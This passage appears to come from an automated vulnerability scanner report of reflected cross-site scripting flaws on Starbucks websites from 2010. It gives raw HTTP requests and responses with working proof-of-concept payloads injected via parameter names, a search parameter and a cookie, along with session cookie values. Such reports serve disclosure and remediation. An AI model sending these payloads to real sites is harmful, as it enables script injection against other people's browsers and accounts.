GET /responsibility/community/starbucks-foundation?85521"style%3d"x%3aexpression(alert(1))"af4db09bc1a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 21:08:18 GMT Connection: close Content-Length: 39222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-foundation?85521"style="x:expression(alert(1))"af4db09bc1a=1"/> ...[SNIP]...
3.62. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/starbucks-red
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17939"style%3d"x%3aexpression(alert(1))"3c77ff10018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17939"style="x:expression(alert(1))"3c77ff10018 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community/starbucks-red?17939"style%3d"x%3aexpression(alert(1))"3c77ff10018=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 21:02:25 GMT Connection: close Content-Length: 42231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-red?17939"style="x:expression(alert(1))"3c77ff10018=1"/> ...[SNIP]...
3.63. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/youth-action
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40290"style%3d"x%3aexpression(alert(1))"07bc4a8acaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 40290"style="x:expression(alert(1))"07bc4a8acaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community/youth-action?40290"style%3d"x%3aexpression(alert(1))"07bc4a8acaf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:29:53 GMT Connection: close Content-Length: 40428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/youth-action?40290"style="x:expression(alert(1))"07bc4a8acaf=1"/> ...[SNIP]...
The value of the 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b88b9%20style%3dx%3aexpression(alert(1))%20df8091f7da5 was submitted in the 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc parameter. This input was echoed as b88b9 style=x:expression(alert(1)) df8091f7da5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97134"style%3d"x%3aexpression(alert(1))"eb377b674b2 was submitted in the keywords parameter. This input was echoed as 97134"style="x:expression(alert(1))"eb377b674b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:24:22 GMT Content-Length: 33897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2"/> ...[SNIP]...
3.66. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fd7"style="x:expression(alert(1))"61073b145fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:39 GMT Content-Length: 33815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1"/> ...[SNIP]...
3.67. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/site-map
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c69e5"style%3d"x%3aexpression(alert(1))"a6d88efaaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c69e5"style="x:expression(alert(1))"a6d88efaaa3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /site-map?c69e5"style%3d"x%3aexpression(alert(1))"a6d88efaaa3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 21:10:05 GMT Connection: close Content-Length: 91702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/site-map?c69e5"style="x:expression(alert(1))"a6d88efaaa3=1"/> ...[SNIP]...
3.68. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/store-locator
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5221e"style%3d"x%3aexpression(alert(1))"76d35535f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5221e"style="x:expression(alert(1))"76d35535f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /store-locator?5221e"style%3d"x%3aexpression(alert(1))"76d35535f4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:07:39 GMT Connection: close Content-Length: 39833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/store-locator?5221e"style="x:expression(alert(1))"76d35535f4=1"/> ...[SNIP]...
3.69. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/whats-new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"style%3d"x%3aexpression(alert(1))"ef582612840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68c58"style="x:expression(alert(1))"ef582612840 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /whats-new?68c58"style%3d"x%3aexpression(alert(1))"ef582612840=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:19 GMT Connection: close Content-Length: 44105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/whats-new?68c58"style="x:expression(alert(1))"ef582612840=1"/> ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94486</script><script>alert(1)</script>44201d6d60c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB94486</script><script>alert(1)</script>44201d6d60c;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:38 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB94486</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>44201D6D60C" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7108a</script><script>alert(1)</script>5486b3db851 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GuestAssist/poweredbycooking.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB7108a</script><script>alert(1)</script>5486b3db851;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14241 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:42 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... weredbycooking.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/poweredbycooking.asp" var s_prop3="SBPTPAHP1SHTB7108A</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>5486B3DB851" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/poweredbycooking.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902c6</script><script>alert(1)</script>c645460f9b8 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /StarbucksCard/default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB902c6</script><script>alert(1)</script>c645460f9b8;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19859 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:44 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... rbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB902C6</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C645460F9B8" var s_prop4="" var s_prop5="" var s_prop6="/starbuckscard/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eafb</script><script>alert(1)</script>892117031bf was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Tours/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6eafb</script><script>alert(1)</script>892117031bf;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16822 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:58 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... e="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB6EAFB</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>892117031BF" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-tours/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaig ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ee24</script><script>alert(1)</script>86a7be884f9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6ee24</script><script>alert(1)</script>86a7be884f9;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29740 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:50 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <title>Coffee at Starbucks Store</title> <meta name="description" content="Shop for Coffee at Starbucks Store"> <meta name="keywords" content="Coffee, Sta ...[SNIP]... s_pageName="Coffee HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Coffee HomePage" var s_prop3="SBPTPAHP1SHTB6EE24</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>86A7BE884F9" var s_prop4="" var s_prop5="" var s_prop6="/coffee/default.asp?CCAID=SBPTPAHP1SHCO&Redir=/coffee/" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea760</script><script>alert(1)</script>6b70b264755 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBea760</script><script>alert(1)</script>6b70b264755;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29705 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:52 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <title>Coffee at Starbucks Store</title> <meta name="description" content="Shop for Coffee at Starbucks Store"> <meta name="keywords" content="Coffee, Sta ...[SNIP]... s_pageName="Coffee HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Coffee HomePage" var s_prop3="SBPTPAHP1SHTBEA760</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6B70B264755" var s_prop4="" var s_prop5="" var s_prop6="/coffee/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_sta ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c32</script><script>alert(1)</script>953da364365 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
